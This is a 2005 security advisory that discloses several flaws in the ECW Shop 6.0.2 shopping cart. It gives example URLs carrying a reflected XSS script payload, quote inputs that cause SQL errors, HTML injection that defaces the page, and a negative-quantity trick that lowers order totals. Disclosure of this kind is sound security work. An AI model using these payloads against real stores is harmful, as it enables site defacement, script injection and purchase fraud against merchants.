ECWshop.txt

2005-08-17T00:00:00
ID PACKETSTORM:39426
Type packetstorm
Reporter John Cobb
Modified 2005-08-17T00:00:00

Description

                                        
                                            `Hello All,  
  
I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2  
  
Authors Site: http://www.soft4e.com/  
  
ECW Shop is described by its authors as:  
  
ECW-Shop - simple for use featured shopping cart with ability to use Excel  
or Access format for database.  
  
+-[Examples:]--------------------------------------------------+  
  
  
  
[1]------------------------------------------------------------+  
  
XSS: (This same problem was reported on version 5.5 by David S. Ferreira -  
http://www.securityfocus.com/bid/9244)  
  
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3  
6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script  
>  
  
[2]------------------------------------------------------------+  
  
Information Disclosure & Possible SQL Injection:  
  
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3  
6d90d8e9&key=1&comp=1&min='&max=1  
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3  
6d90d8e9&key=1&comp=1&min=1&max='  
  
Error:  
  
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result  
resource in /var/www/html/search.php on line 109  
  
[3]------------------------------------------------------------+  
  
HTML Injection:  
  
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3  
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>  
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i  
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&ma  
x=1  
  
[4]------------------------------------------------------------+  
  
Cart/Order Manipulation:  
  
You can add negative quanity value items to your cart to gain credit.  
  
Example:  
  
Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of  
£6.99  
  
Cart Total: £2.00  
  
+-[Notes:]-----------------------------------------------------+  
  
Vulnerabilities found on: 06/08/2005  
Author(s) Informed on: 06/08/2005  
Author(s) Response: NONE  
Author(s) Fix: NONE  
  
  
JohnC@NoBytes.com  
  
http://www.NoBytes.com  
  
  
  
`